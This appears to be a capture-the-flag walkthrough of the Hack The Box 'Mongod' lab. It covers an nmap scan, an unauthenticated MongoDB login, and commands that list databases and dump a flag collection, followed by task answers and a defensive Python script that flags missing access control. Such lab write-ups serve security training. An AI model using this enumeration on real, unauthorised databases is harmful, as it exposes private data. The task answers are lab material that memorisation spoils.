Hey folks, how's it going?
Today I'm bringing the walkthrough of the Mongod lab from HTB's Starting Point.
Capture the Flag
First, I ran nmap to discover the open ports.
I'll focus on port 27017, which is running MongoDB version 3.6.8.
nmap -sSV -p- -Pn 10.129.8.113 --min-rate=1000
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-24 10:00 EST
Nmap scan report for 10.129.8.113
Host is up (0.19s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
27017/tcp open mongodb MongoDB 3.6.8
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.64 seconds
After locating the open port, I needed to access the database, and for that mongodb has to be installed.
apt-get install mongodb
With it installed, I can now connect to the database, which in this case did not require a username and password for authentication.
mongo 10.129.61.2
MongoDB shell version v6.0.1
connecting to: mongodb://10.129.61.2:27017/test?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("f5d776e4-6bb0-42a2-a31b-92c29982da74") }
MongoDB server version: 3.6.8
WARNING: shell and server versions do not match
================
Warning: the "mongo" shell has been superseded by "mongosh",
which delivers improved usability and compatibility.The "mongo" shell has been deprecated and will be removed in
an upcoming release.
For installation instructions, see
https://docs.mongodb.com/mongodb-shell/install/
================
---
The server generated these startup warnings when booting:
2023-03-27T18:34:09.245+0000 I STORAGE [initandlisten]
2023-03-27T18:34:09.245+0000 I STORAGE [initandlisten] ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
2023-03-27T18:34:09.245+0000 I STORAGE [initandlisten] ** See http://dochub.mongodb.org/core/prodnotes-filesystem
2023-03-27T18:34:12.276+0000 I CONTROL [initandlisten]
2023-03-27T18:34:12.276+0000 I CONTROL [initandlisten] ** WARNING: Access control is not enabled for the database.
2023-03-27T18:34:12.276+0000 I CONTROL [initandlisten] ** Read and write access to data and configuration is unrestricted.
2023-03-27T18:34:12.276+0000 I CONTROL [initandlisten]
---
>
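An added example, not part of the original write-up: the CONTROL warning in the banner above is the server itself reporting the misconfiguration that made the unauthenticated login possible. This Python script parses those startup lines and flags it; the rule table, the remediation text and the function names are this example's own assumptions.

```python
import re

# Startup warnings copied from the shell banner above (MongoDB 3.6 log layout:
# timestamp, severity, component, [context], message).
BANNER = """\
2023-03-27T18:34:09.245+0000 I STORAGE [initandlisten]
2023-03-27T18:34:09.245+0000 I STORAGE [initandlisten] ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
2023-03-27T18:34:09.245+0000 I STORAGE [initandlisten] ** See http://dochub.mongodb.org/core/prodnotes-filesystem
2023-03-27T18:34:12.276+0000 I CONTROL [initandlisten]
2023-03-27T18:34:12.276+0000 I CONTROL [initandlisten] ** WARNING: Access control is not enabled for the database.
2023-03-27T18:34:12.276+0000 I CONTROL [initandlisten] ** Read and write access to data and configuration is unrestricted.
2023-03-27T18:34:12.276+0000 I CONTROL [initandlisten]
"""
LINE_RE = re.compile(r"^(\S+)\s+([A-Z])\s+([A-Z]+)\s+\[([^\]]+)\]\s*(.*)$")
# Assumed triage rules (this example's own): component, pattern, severity, fix.
RULES = [("CONTROL", re.compile(r"access control is not enabled", re.I), "critical",
          "set security.authorization: enabled in mongod.conf and create users")]

def parse_warnings(text):
    """Fold each '** WARNING:' line and its '**' continuation lines into one record."""
    warnings, current = [], None
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        msg = m.group(5).strip() if m else ""
        if msg.startswith("** WARNING:"):
            current = {"ts": m.group(1), "component": m.group(3),
                       "text": msg[len("** WARNING:"):].strip()}
            warnings.append(current)
        elif msg.startswith("**") and current and m.group(3) == current["component"]:
            current["text"] += " " + msg[2:].strip()
        else:
            current = None  # an empty message line (or non-log line) ends the warning
    return warnings

def triage(text):
    """Attach a severity and remediation to every warning; unmatched ones are 'info'."""
    findings = []
    for w in parse_warnings(text):
        severity, fix = "info", ""
        for component, pattern, sev, remedy in RULES:
            if w["component"] == component and pattern.search(w["text"]):
                severity, fix = sev, remedy
        findings.append({**w, "severity": severity, "fix": fix})
    return findings

if __name__ == "__main__":
    for f in triage(BANNER):
        print(f["severity"].upper(), f["component"], f["text"], f["fix"], sep=" | ")
```

Run against a server's own mongod log, the same check catches the missing access control on the host side before anyone connects from the network.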
With the show dbs command, I could see the names of all the databases.
> show dbs
admin 0.000GB
config 0.000GB
local 0.000GB
sensitive_information 0.000GB
users 0.000GB
With the use sensitive_information command, I switched to the sensitive_information database.
> use sensitive_information
switched to db sensitive_information
With the show collections command, I could see the name of the flag collection, the only one in this database.
> show collections
flag
To view the contents of the collection in a more "friendly" way, I used the command db.flag.find().pretty()
> db.flag.find().pretty()
{
"_id" : ObjectId("630e3dbcb82540ebbd1748c5"),
"flag" : "1b6e6fb359e7c4024XXXXXXXXXXXXX"
}
>
Tasks
TASK 1 – How many TCP ports are open on the machine?
A: 2
TASK 2 – Which service is running on port 27017 of the remote host?
A: MongoDB 3.6.8
TASK 3 – What type of database is MongoDB? (Choose: SQL or NoSQL)
A: NoSQL
TASK 4 – What is the command name for the Mongo shell that is installed with the mongodb-clients package?
A: mongo
TASK 5 – What is the command used for listing out the collections in a database? (No need to include a trailing)
A: show dbs
TASK 6 – What is the command used for listing out the collections in a database? (No need to include a trailing)
A: show collections
TASK 7 – What is the command used for dumping the content of all the documents within the collection named flag in a format that is easy to read?
A: db.flag.find().pretty()
SUBMIT FLAG – Submit root flag
A: 1b6e6fb359e7c4024XXXXXXXXXXX